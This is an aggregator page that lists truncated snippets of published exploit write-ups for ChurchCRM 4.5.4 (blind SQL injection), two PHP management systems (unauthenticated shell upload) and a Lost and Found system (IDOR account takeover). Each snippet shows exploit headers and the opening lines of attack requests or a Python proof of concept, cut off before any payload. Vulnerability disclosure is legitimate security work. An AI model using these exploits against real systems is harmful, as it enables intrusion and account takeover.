comparemela.com

Exploit Title News Today : Breaking News, Live Updates & Top Stories | Vimarsana

ChurchCRM 4.5.4 SQL Injection - KizzMyAnthia.com

# Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid
# Date: 03-05-2023
# Exploit Author: Arvandy
# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md
# Software Link: https://github.com/ChurchCRM/CRM/releases
# Vendor Homepage: http://churchcrm.io/
# Version: 4.5.4
# Tested on: Windows, Linux
# CVE: CVE-2023-29842
"""
The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.
This endpoint can be triggered through the

WordPress WP ERP 1.12.2 SQL Injection - KizzMyAnthia.com

Zoo Management System 1.0 Shell Upload - KizzMyAnthia.com

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE
# Date: 16.10.2023
# Exploit Author: Çağatay Ceyhan
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database
# Version: 1.0
# Tested on: Windows 11
#
# Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.
POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
Host: localhost
Content-Length: 6162
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117",

Clinic's Patient Management System 1.0 Shell Upload

# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
# Date: 07.10.2023
# Exploit Author: Oğulcan Hami Gül
# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10
#
# Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.
curl -i -s -k -X

Lost And Found Information System 1.0 Insecure Direct Object Reference

# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965
Python p0c :
import argparse
import requests
import time
parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()
url = args.url

© 2025 Vimarsana
